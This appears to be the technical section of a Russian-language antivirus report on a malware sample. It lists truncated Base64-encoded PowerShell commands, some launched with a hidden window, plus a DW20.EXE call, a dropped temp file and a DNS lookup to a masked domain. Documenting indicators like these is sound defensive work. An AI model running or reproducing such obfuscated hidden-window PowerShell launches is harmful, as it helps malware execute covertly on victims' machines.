Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHAAYAB3AGkAYABKAE8AdwB9AD0AWwB3AG0AaQBjAGwAYQBzAHMAXQAoACIAewAxAH0AewAzAH0AewA0AH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAVwBpAG4AMwAnACwAJwByAHQAdQAnACwAJwAyACcALAAnAF8AUAByAG8AYwBlAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAZQB0ACcAKQAgACAAKAAnAHYAZgAnACsAJwBIAFoAZQAnACsAJwB5ACcAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADcAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQB7ADUAfQB7AD...
- %TEMP%\1154032.cvr
- DNS ASK st####hthoods.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHAAYAB3AGkAYABKAE8AdwB9AD0AWwB3AG0AaQBjAGwAYQBzAHMAXQAoACIAewAxAH0AewAzAH0AewA0AH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAVwBpAG4AMwAnACwAJwByAHQAdQAnACwAJwAyACcALAAnAF8AUAByAG8AYwBlAH...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAZQB0ACcAKQAgACAAKAAnAHYAZgAnACsAJwBIAFoAZQAnACsAJwB5ACcAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADcAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQB7ADUAfQB7AD...' (со скрытым окном)